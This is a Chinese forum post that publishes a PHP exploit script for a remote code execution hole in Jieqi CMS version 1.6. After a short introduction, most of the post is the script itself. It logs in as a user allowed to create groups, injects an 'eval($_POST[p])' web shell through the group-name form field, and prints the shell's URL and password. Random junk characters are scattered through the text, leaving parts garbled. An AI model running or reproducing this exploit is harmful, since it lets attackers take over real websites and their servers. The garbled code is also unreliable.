杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。: H8 V% t) o4 ]% J6 {
8 B L# }& u7 O/ D
8 P, C, \# h! l9 ?: A/ c) c2 H. S该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。$ T& O+ @$ G9 @
需要有一个能创建圈子的用户。
) b$ i& N5 ^/ s' Q1 p + k$ Q7 b9 Z8 C5 Q" O
<?php9 \0 T! O$ W) h( [
3 O' x. t6 ~. wprint_r('! x7 ]) {) Q# W- _1 J1 H' y
+---------------------------------------------------------------------------+
% T2 u+ u6 ^2 JJieqi CMS V1.6 PHP Code Injection Exploit
: E4 P& K- y8 C* n' ?( Bby flyh4t% I0 g8 E9 K9 u
mail: phpsec at hotmail dot com
" y; X5 ^: D5 Uteam: http://www.wolvez.org
3 n/ S6 W, R. B, V' `! o9 q. C3 ?( F/ U+---------------------------------------------------------------------------+
! B+ x" e2 y8 S' y2 |9 }'); /**' e R* t) U& P3 l
* works regardless of php.ini settings
6 |% ?" D: i; y5 Z% e*/ if ($argc < 5) { print_r('
: d+ D! b4 g2 Z# C+ L4 @+---------------------------------------------------------------------------+
$ a, [6 W$ k% @6 V9 QUsage: php '.$argv[0].' host path username' w' W$ q0 y( b
host: target server (ip/hostname)
" Q5 U9 Y/ Y, A* kpath: path to jieqicms * q8 Q# ]9 [% R" \4 U1 }
uasename: a username who can create group. {7 l& x( {- t+ |- m
Example:
. l' h( [% T5 ]php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
0 k$ J( T/ J- P) i9 ~; y% T& r+---------------------------------------------------------------------------+4 M: ?# ^* W- |- R
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
( f( t( W3 v5 tContent-Disposition: form-data; name="gname"
0 C' B" Q5 J* t7 E7 }- W & r& a2 C5 A; n' P$ Q" Y
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t/ P0 y5 C+ @, n/ c
-----------------------------23281168279961
" t1 {+ [+ w2 k$ ~% T8 PContent-Disposition: form-data; name="gcatid"
7 g# A3 Z- c; V! x/ m5 l: v ' ~' V3 y8 K) k6 G% S; |# {+ }
1
3 f6 o9 a+ Q X A$ O. |-----------------------------23281168279961: u Y: @/ j+ a' g" `
Content-Disposition: form-data; name="gaudit"
) W, i7 A" {* Y7 T& {7 z
. A. O8 F! ]5 N& ?7 v1
8 K: C# {2 f# s0 ^+ _9 U-----------------------------23281168279961/ a4 L9 \" p H" ]
Content-Disposition: form-data; name="gbrief"
- n: A8 G; q! `% _ 7 X2 k7 l: C! ?8 d. J, S0 P. b
19 f; i7 J4 f. u/ p0 V4 H/ I
-----------------------------23281168279961--
0 W. e" F0 E S1 y% S'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
( Z$ t+ ]) ]; D; K* M, g" J& i1 ~ * s, l: v9 H% \3 N
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对